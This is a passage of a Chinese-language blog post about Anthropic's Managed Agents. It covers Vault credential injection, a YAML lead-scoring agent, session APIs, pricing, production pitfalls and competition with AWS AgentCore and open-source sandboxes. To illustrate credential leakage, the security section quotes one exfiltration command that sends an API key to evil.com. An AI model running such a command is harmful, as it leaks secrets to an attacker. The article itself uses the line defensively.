credentials。所有的密钥、token、API keys都由 Anthropic 的 Vault 服务在沙箱内部进行安全注入且注入的时机是在沙箱启动之后、tool code 执行之前并且注入的凭证是经过短期时效签名的过期即失效。这种设计带来的安全收益是几何级的。想象一下一个 agent 被诱导执行了curl https://evil.com?token${API_KEY}。在传统模式下如果API_KEY是作为环境变量注入的那么这条命令就能成功窃取密钥。而在 Managed Agents 的沙箱里API_KEY根本不会以明文形式存在于环境变量中它只在 tool code 内部、在需要调用 API 的那一行代码里才被 Vault 动态解密并使用用完即焚。这从根本上堵死了 credential leakage 这条最危险的攻击路径。它不是靠“防火墙”来防御而是靠“基因编辑”让沙箱从出生起就不具备泄露密钥的生理结构。3. 实操落地从 YAML 配置到生产环境的完整闭环3.1 定义你的第一个 AgentYAML 是新的编程语言在 Managed Agents 的世界里你不再需要写几百行 Python 代码来初始化一个 LangChain chain。定义一个 agent 的全部浓缩在一份清晰、声明式的 YAML 文件里。这并非偷懒而是将“意图”Intent与“实现”Implementation彻底分离。你告诉 Anthropic “我要做什么”而不是“我该怎么一步步做”。以下是一个为销售团队构建的“线索评分 agent”的完整 YAML 示例# sales-lead-scorer.yaml name: Sales Lead Scorer description: Scores inbound leads based on firmographic data and engagement history. system_prompt: | You are a senior sales operations analyst at Acme Corp. Your job is to score leads on a scale of 1-100. Use the following criteria: - Company size (10 points): 1000 employees 10, 500-999 7, 500 3 - Industry (15 points): Tech, Finance, Healthcare 15, Others 5 - Website traffic (20 points): 50k/mo 20, 10k-50k 15, 10k 5 - Email open rate (25 points): 40% 25, 20-40% 15, 20% 5 - Meeting booked (30 points): Yes 30, No 0 Always output ONLY a JSON object with score and reason fields. tools: - name: get_company_info description: Fetches company size, industry, and website traffic from Clearbit API. input_schema: type: object properties: domain: type: string description: The companys website domain. allowed_hosts: [api.clearbit.com] timeout_ms: 5000 - name: get_engagement_data description: Fetches email open rate and meeting status from HubSpot CRM. input_schema: type: object properties: contact_id: type: string description: The HubSpot contact ID. allowed_hosts: [api.hubspot.com] timeout_ms: 8000 guardrails: - type: output_format schema: type: object properties: score: type: integer minimum: 1 maximum: 100 reason: type: string required: [score, reason] - type: pii_redaction patterns: - email - phone - ssn - type: content_moderation severity_threshold: high这份 YAML 的力量在于它将所有关键决策都显式化了。system_prompt不再是藏在代码注释里的模糊要求而是 agent 行为的宪法。tools的input_schema强制了类型安全避免了因传入错误参数导致的 tool call 失败。guardrails则像一套内置的合规引擎自动过滤 PII 信息、强制输出格式、拦截有害内容。当你把这份 YAML 提交给 Anthropic你就完成了一次“契约式编程”Contract-based Programming。你承诺了输入的格式Anthropic 承诺了输出的格式和行为边界。这极大地降低了协作成本和线上故障率。3.2 会话管理awake()与pause()的艺术在 Managed Agents 中“启动一个 agent”这个动作消失了。取而代之的是awake(sessionId)和pause(sessionId)这两个核心 API。这反映了其设计理念的根本转变agent 不是一个需要被“启动”的进程而是一个随时待命的、有状态的服务。awake()的调用本质上是向系统发出一个信号“请为这个 sessionId 准备好一个 Harness并让它从事件日志的最新位置开始工作。” 它的响应体里会包含一个sessionId和一个next_action字段告诉你下一步该做什么。一个典型的、与 Slack 集成的销售线索处理流程如下触发Slack bot 收到一条新消息sales-bot score lead for acme.com。唤醒Bot 后端调用POST /v1/sessions/awake传入{user_id: U123, initial_input: acme.com}。系统返回{session_id: sess_xyz789, next_action: TOOL_CALL, tool_name: get_company_info, tool_input: {domain: acme.com}}。执行Bot 后端解析next_action调用execute(get_company_info, {domain: acme.com})。循环Harness 执行完毕将TOOL_RESULT事件写入日志并返回新的next_action。Bot 后端持续轮询或监听 webhook直到next_action变为COMPLETE此时它会从日志中读取最终的OUTPUT事件将score和reason发送给 Slack 用户。实操心得pause()的使用时机是区分业余和专业玩家的关键。不要等到 agent 把所有事情都做完才pause()。你应该在每一个关键决策点之后主动pause()。例如在get_company_info返回结果后pause()在get_engagement_data返回后pause()。这样做的好处是如果用户中途想修改需求比如“等等先别查 HubSpot先看看他们的 LinkedIn 页面”你可以直接awake()并注入一个新的USER_MESSAGE事件覆盖掉原本的执行路径。这实现了真正的“人机协同”而不是“机器单干人只能等结果”。3.3 定价模型$0.08/小时背后的精算逻辑Managed Agents 的定价是$0.08 per session-hour of active runtime外加标准的 Claude token 费用。乍看之下这似乎比自己租用 EC2 实例便宜不了多少。但这里的“session-hour”是一个极具迷惑性的概念它的真实含义是agent 在 Harness 上实际执行代码所消耗的 CPU 时间总和。它不计算等待 I/O比如 API 调用响应的时间不计算事件日志写入的时间不计算模型推理的时间那是 token 费用的范畴。我们来做一个真实测算。假设你的销售线索评分 agent平均一次完整的评分流程需要1 次get_company_infotool call平均耗时 1200ms1 次get_engagement_datatool call平均耗时 2500ms模型自身的思考和格式化输出约 800ms计入 token 费用那么这次 session 的active runtime就是1.2 2.5 3.7 秒。按 $0.08/小时换算每秒成本是$0.08 / 3600 ≈ $0.0000222。3.7 秒的成本约为$0.000082也就是不到一美分的八分之一。这意味着即使你的 agent 每天处理 10,000 条线索其 runtime 成本也仅为$0.82完全可以忽略不计。这个定价模型的精妙之处在于它将成本与你的 agent 的工程效率直接挂钩。如果你的get_company_infotool 因为没有设置合理的timeout_ms导致在 Clearbit API 响应慢时卡住 30 秒那么这 30 秒就会被计入active runtime成本飙升。这倒逼你必须写出高效、健壮、有兜底的 tool code。它不是一个“包年包月”的懒政式收费而是一个“用多少付多少”的精益生产计费。对于那些已经将 tool code 优化到极致的团队Managed Agents 的 runtime 成本几乎可以视为零。4. 生产级挑战与避坑指南那些文档里不会写的血泪教训4.1 事件日志的“双刃剑”查询性能与成本陷阱事件日志的持久化和可查询性是 Managed Agents 的王牌。但当你开始在生产环境中大规模使用时一个隐藏的陷阱会浮现日志查询的性能和成本会随着 session 的生命周期呈非线性增长。Anthropic 提供的GET /v1/sessions/{id}/eventsAPI虽然强大但它默认只返回最近的 100 条事件。如果你想获取一个运行了 72 小时、产生了 5000 条事件的 session 的完整日志你需要分页调用而每一次调用都会产生一次 API 请求费用和延迟。我们曾在一个金融风控 agent 上踩过这个坑。该 agent 需要对每一笔交易进行长达 20 分钟的多步分析期间会产生数百条事件。当审计团队需要回溯某一笔可疑交易的完整决策链时我们的后台服务需要发起数十次 API 调用耗时超过 15 秒用户体验极差。最终的解决方案是引入一个“日志归档”策略在 sessionCOMPLETE后立即调用GET /v1/sessions/{id}/events?limit10000获取全量日志并将其压缩、加密后存入我们自己的 S3 仓库。后续的所有审计查询都直接从 S3 进行毫秒级响应。这额外增加了一小段代码却将审计延迟从 15 秒降到了 200 毫秒。注意这个策略也带来了另一个权衡——数据一致性。S3 中的日志是COMPLETE时刻的快照。如果 session 因为某种原因被resume并继续执行S3 中的日志就不会更新。因此我们的归档逻辑里加入了对session.status的实时监听一旦状态变为RESUMED就自动删除旧的归档触发新的归档流程。4.2 沙箱的“幽灵依赖”本地开发与云端执行的鸿沟在本地用docker run测试你的 tool code 时一切顺利。但一旦部署到 Managed Agents 的沙箱里import pandas就报ModuleNotFoundError。这不是 bug而是 Managed Agents 沙箱的“纯净主义”原则在作祟。它默认只提供最精简的 Python 运行时Python 3.11不预装任何第三方库。你必须在 YAML 的tools定义中显式声明每一个 tool 所需的依赖。正确的做法是在tools下添加requirements字段- name: analyze_financial_report description: Uses pandas and numpy to calculate financial ratios. input_schema: { ... } requirements: - pandas2.2.2 - numpy1.26.4 # ... 其他配置这个字段的作用是告诉 Anthropic 的构建系统在为这个 tool 创建沙箱镜像时自动运行pip install pandas2.2.2 numpy1.26.4。这里有两个极易被忽视的细节版本锁定必须指定精确版本号不能用或~。因为沙箱的构建是确定性的不同版本的 pandas 可能有细微的行为差异导致本地测试通过云端执行失败。依赖树爆炸pandas会自动安装numpy但如果你在requirements里同时写了pandas2.2.2和numpy1.26.4而这两个版本不兼容构建就会失败。最佳实践是只写你直接 import 的包让 pip 自动解析其依赖树。4.3 Guardrails 的“过度保护”如何让 AI 说人话guardrails是一把锋利的双刃剑。output_formatguardrail 能确保你的 agent 总是输出 JSON这很棒。但content_moderationguardrail 的severity_threshold: high却可能在关键时刻“封印”你的 agent。我们曾为一个医疗问答 agent 设置了此规则结果发现当用户问“我父亲有高血压能吃阿司匹林吗”agent 的回复中包含了“阿司匹林”和“高血压”这两个高风险词被content_moderation拦截返回了通用的“我无法回答此问题”。这显然违背了产品的初衷。解决方案是采用“分层防护”策略对于output_format和pii_redaction保持全局启用。对于content_moderation改为severity_threshold: medium并配合一个自定义的allowlist将医学术语如aspirin,hypertension,insulin加入白名单。YAML 中可以这样写- type: content_moderation severity_threshold: medium allowlist: - aspirin - hypertension - diabetes - insulin这样agent 就能在合规的前提下说出真正有用的专业信息。Guardrails 不是越严越好而是要像外科医生的手术刀精准地切掉病灶而不伤及健康组织。5. 竞争格局与未来演进为什么 runtime 层注定走向“零价”5.1 Hyperscaler 的碾压式入场AWS AgentCore 的启示Anthropic 的 Managed Agents 发布新闻稿里通篇没有提及一个名字Amazon Bedrock AgentCore。但这恰恰是整篇文章最核心的背景音。AgentCore 在 2025 年底就已进入 GAGeneral Availability到 2026 年 3 月其 SDK 下载量已突破两百万次。它的架构与 Managed Agents 高度相似session 作为事件日志、harness 无状态、microVM 沙箱。但它有一个 Managed Agents 永远无法企及的优势它免费。AWS 的商业模式从来不是靠卖 runtime 来赚钱。它的目标是让你的整个 AI 应用栈都运行在 AWS 的基础设施之上。当你在 AgentCore 上运行一个 Claude agent 时你支付的是 EC2 实例的费用、S3 存储的费用、CloudWatch 日志的费用以及最关键的——Bedrock 的 Claude token 费用。AgentCore 本身只是一个免费的、高度集成的“胶水层”。这就像当年 VMware 卖 ESX 时AWS 说“我们不卖 hypervisor我们卖的是整个数据中心。你用我们的 EC2hypervisor 就是免费的。”这个事实决定了 Managed Agents 的战略定位。它不是一个要“赢”得 runtime 市场的进攻性产品而是一个防御性的“客户留存工具”。它的存在是为了回答那个尖锐的问题“如果我不提供托管 runtime我的 Claude token 客户会不会轻易地把他们的 agent 迁移到 AWS 上然后在 AgentCore 里无缝地切换到 Llama 3 或 Gemini Pro仅仅因为它们更便宜” Managed Agents 的答案是“不会。因为迁移到 AWS意味着你要重写 YAML重构 tool code重新配置 guardrails还要承担 AWS 的 vendor lock-in。而留在 Anthropic你只需点击几下就能获得一个同样强大、且与 Claude 深度优化的 runtime。”5.2 开源压力曲线Daytona 与 Kubernetes SIG 的“平价替代”如果说 hyperscaler 是从“价格”上施压那么开源社区则是从“创新速度”和“定制自由度”上发起挑战。2025 年初Daytona 项目宣布转型从一个 DevOps 环境工具全面进军 AI agent infrastructure。它在 2026 年 2 月完成的 2400 万美元 A 轮融资其核心卖点就是“sub-90ms sandbox spin-up times”。这个数字比 Anthropic 宣称的“p50 time-to-first-token down roughly 60%”更具象、更可衡量。更值得警惕的是 Kubernetes SIGSpecial Interest Group的动作。他们在 2026 年初正式将kubernetes-sigs/ai-agent-sandbox项目纳入官方孵化计划。这意味着未来任何一个 K8s 集群都可以通过一个简单的kubectl apply -f agent-sandbox.yaml就原生获得一个符合 CNCFCloud Native Computing Foundation标准的、可插拔的 agent 沙箱。它的优势在于无与伦比的可移植性你的 agent YAML今天可以在 Anthropic 上跑明天就可以一键部署到你自己的 K8s 集群后天还能跑到 GCP 的 GKE 上。这种“write once, run anywhere”的愿景是对所有闭源托管 runtime 的终极降维打击。实操心得面对这种开源浪潮最愚蠢的策略是“闭门造车”。最聪明的做法是拥抱它。我们团队的策略是将所有核心的 business logic都封装在符合 OpenAPI 规范的、独立的微服务中如sales-scoring-service。Managed Agents 的 YAML只负责 orchestrate编排这些服务。这样当某一天 Daytona 的性能真的超越了 Anthropic我们只需修改 YAML 中的toolURL指向我们自己的 K8s 服务整个 agent 的行为逻辑毫发无损。Runtime 是可替换的但你的业务价值永远沉淀在你的 service 里。5.3 价值迁移的三大高地Trace Store、Governance、Vertical Marketplace当 runtime 层不可避免地滑向“零价”时整个 AI 工程的价值重心将剧烈地向上迁移。这场迁移已经在三个方向上清晰可见第一Trace Store追踪存储谁拥有了 agent 所有行为的、权威的、不可篡改的“真相之源”谁就拥有了下一阶段的入口。Braintrust 的 Brainstore、Arize 的 Phoenix、LangSmith它们的竞争焦点早已不是谁的 UI 更漂亮而是谁能提供最强的“trace portability”。一个企业客户会问“如果我今天用 Anthropic明天迁移到 AgentCore我过去三年的 10 亿条 agent 交互日志能不能一键导入你们的系统继续做分析” 这个问题的答案将决定 Trace Store 的生死。第二Governance Policy治理与策略当 agent 开始自主调用银行 API、修改 CRM 数据、甚至生成法律合同企业采购部门的首要问题不再是“它快不快”而是“它准不准”、“它合不合规”、“出了事谁负责”。AWS AgentCore 在 2026 年 3 月 GA 的 Policy Controls就是对这一需求的直接回应。它允许你定义“这个 agent 只能调用get_customer_data不能调用delete_customer_data”“所有send_email的内容必须经过法务部门的email_approvaltool 审批后才能发送”。这是一个全新的、价值巨大的软件品类它不卖 compute它卖的是“可控性”。第三Vertical Marketplace垂直领域市场Salesforce 的 Agentforce ARR 达到 8 亿美元这个数字说明了一切。企业愿意为一个能解决“销售线索评分”、“财务报表分析”、“网络安全渗透测试”这些具体问题的 agent 付费但绝不愿意为一个通用的、需要自己配置的 runtime 付费。未来的赢家将是那些深耕某个垂直领域将行业知识、最佳实践、合规要求全部打包进一个开箱即用的 agent 里的公司。它们的商业模式将从“卖软件”转向“卖结果”——按每成功转化一个销售线索收费按每份生成的合规财报收费按每次发现的安全漏洞收费。6. 我的实战体会从“runtime 焦虑”到“价值聚焦”在我亲手把公司的核心客服 agent从自建的 LangChain FastAPI 架构迁移到 Anthropic Managed Agents 的这三个月里最大的感受不是技术上的兴奋而是一种前所未有的“解脱感”。那种每天早上打开 Grafana第一件事就是检查context_overflow_rate和sandbox_crash_count的焦虑消失了。取而代之的是我可以把全部精力投入到真正创造价值的地方和产品经理一起重新梳理客服 SOP把那些过去只能靠人工经验判断的“客户情绪等级”、“问题紧急程度”翻译成精确的system_prompt和guardrails和法务团队合作为send_refund_email这个 tool设计一套嵌入式的、基于规则的审批流确保每一笔退款都符合最新的监管要求。Managed Agents 没有让我成为一个更“酷”的工程师但它让我成为一个更“有效”的工程师。它把那些曾经吞噬我 70% 时间的、与业务无关的基础设施难题scaling, observability, security hardening打包成一个可靠的服务。它让我终于可以回答那个困扰了我多年的问题“我的代码到底在为客户解决什么问题” 而不是“我的代码到底在和哪个沙箱的 cgroup 配置做斗争”所以如果你也在评估是否要采用 Managed Agents我的建议很直接不要把它当作一个“要不要买 runtime”的技术选型问题。把它当作一个“要不要把你的团队从基础设施的泥潭里解放出来去专注打磨核心业务逻辑”的战略决策。它的价值不在于它比你自己搭建的 runtime 快了多少毫秒而在于它让你的下一次产品迭代提前了两周上线。而这两周就是你与竞争对手之间最真实的护城河。
:Reasoning与Planning - 让模型想清楚再动手)
:KV Cache - 理解推理性能的关键)
)
